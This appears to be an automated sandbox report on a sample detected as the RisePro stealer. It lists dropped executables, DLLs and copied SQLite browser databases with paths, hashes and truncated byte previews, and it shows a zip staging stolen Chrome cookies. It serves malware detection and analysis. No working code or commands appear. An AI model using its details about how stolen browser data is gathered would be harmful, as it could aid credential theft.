                                          SHA-256:981DAC9395D5A298E17D510DDA31281F9E24C5961D7D2F75EDBC7C9C4653852E
                                          SHA-512:6C7A81233CF3FCB76D77915912AE0F8208260122BF1D10B814BA6DD392E333683B4BE6EA72346BD6C01D4AFC279206FA50B1873CBFBA4004DA818CBB3B18BFA8
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\i2FqtYqlXCxQLo2ZIevRzA8.zip, Author: Joe Security
                                          Reputation:unknown
                                          Preview:PK...........X................Cookies\..PK...........X..E.............Cookies\Chrome_Default.txt....P.@.5.....d...`|L2J1l.. .3."_..N.......q..b..=../c.;{.........4F8...0..Y.........Z}Y.g.<w3.f.W(....K.o..l...!*.......y.o;.F..5%.....|0MS.....J.,....../.o...8.H...,M.......;.....I!.z.W....j...e....fE.?.X....6...g...skL.K.85b.U.5...[/.<.h....C..|...C5"{..i.$...'..W).f.O.i..4.....L..Z..t.Z(].2.m.?..<....]........f..I3?.q..8U.6...8.N.y_#Vb...g.k?.Z1.!.3$.....\.%...PK...........X................information.txt}Y.n...}G..J./..v...<].d&!..;.U..w<..$$W..O....*.VK..=..k..*......n.v.<L..@M.^..n.Z`....~.d...0l..@.".../.]t[.a.P.9..n.X.hx~.5Ll@.....^;....w1.-L.........C.a......P.O.v>-..=s|h....s.........g.U.9p.E.tZO..G..F.4.....YR.O.0^F....{...fo1..r..e.w0y..,.$o.5..i...a.jk/.<...u....."...#.^`..M.....A..MB...&..z.\Q..NF.....~q+.......WE:..(?n....&A........0.R....Z'....e..yeL.@....vxu6....H......1../...i...@d.k.....M.+w.....9.....Y.....%.(...h.....U..
                                          Process:C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):696832
                                          Entropy (8bit):6.462784826688779
                                          Encrypted:false
                                          SSDEEP:12288:L0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv65ELAfXExy8:ffKbT5lrPo37AzHTA63/cfU9IEU653f0
                                          MD5:73919C5267ECFF99768AE00DFA5D9C3F
                                          SHA1:30BF5F65D85F0AD38B55F9703F421A75DFA1443A
                                          SHA-256:B1109164EA90502880CCF035DFE1241F76CABF340C74BE5E1062D78E9C7736AF
                                          SHA-512:5ABD7CB8A1EFB0AFECD1C5EE0C9E34ECCBE4A6BA434361F33EC1223299F6A48AE8F51EC952B7F9C2159EAC69A9FFAF4AE453946F17A647D4CF70D06F114EC3B9
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):4.026670007889822
                                          Encrypted:false
                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2560
                                          Entropy (8bit):2.8818118453929262
                                          Encrypted:false
                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                          MD5:A69559718AB506675E907FE49DEB71E9
                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):13312
                                          Entropy (8bit):5.745960477552938
                                          Encrypted:false
                                          SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                          MD5:A813D18268AFFD4763DDE940246DC7E5
                                          SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                          SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                          SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):4.215994423157539
                                          Encrypted:false
                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                          Category:dropped
                                          Size (bytes):23312
                                          Entropy (8bit):4.596242908851566
                                          Encrypted:false
                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):881664
                                          Entropy (8bit):6.555251818096116
                                          Encrypted:false
                                          SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                          MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                          SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                          SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                          SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Reputation:unknown
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):13
                                          Entropy (8bit):2.8150724101159437
                                          Encrypted:false
                                          SSDEEP:3:LIDlN:UDD
                                          MD5:BE9574D25735A9FC6059B3DE5617193A
                                          SHA1:412EE8CCDCAA106DCC218B572792E84EED723356
                                          SHA-256:70924C264A49E1728AD091E61342FA42A9F2D46A75900E8F6A5556766C0B0B73
                                          SHA-512:469E31CCBB0AED4632A5FC102D752FBB1F2BD51E3FBBDFB169699135606279D7DCB1CDE0E7619FAE07B3099FF005FFE0250AE7E7EE5C2AD900A144568D320448
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1716626914730
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):159744
                                          Entropy (8bit):0.5394293526345721
                                          Encrypted:false
                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):159744
                                          Entropy (8bit):0.5394293526345721
                                          Encrypted:false
                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):5242880
                                          Entropy (8bit):0.03859996294213402
                                          Encrypted:false
                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.8439810553697228
                                          Encrypted:false
                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):155648
                                          Entropy (8bit):0.5407252242845243
                                          Encrypted:false
                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):5242880
                                          Entropy (8bit):0.03859996294213402
                                          Encrypted:false
                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):155648
                                          Entropy (8bit):0.5407252242845243
                                          Encrypted:false
                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.6732424250451717
                                          Encrypted:false
                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):51200
                                          Entropy (8bit):0.8746135976761988
                                          Encrypted:false
                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
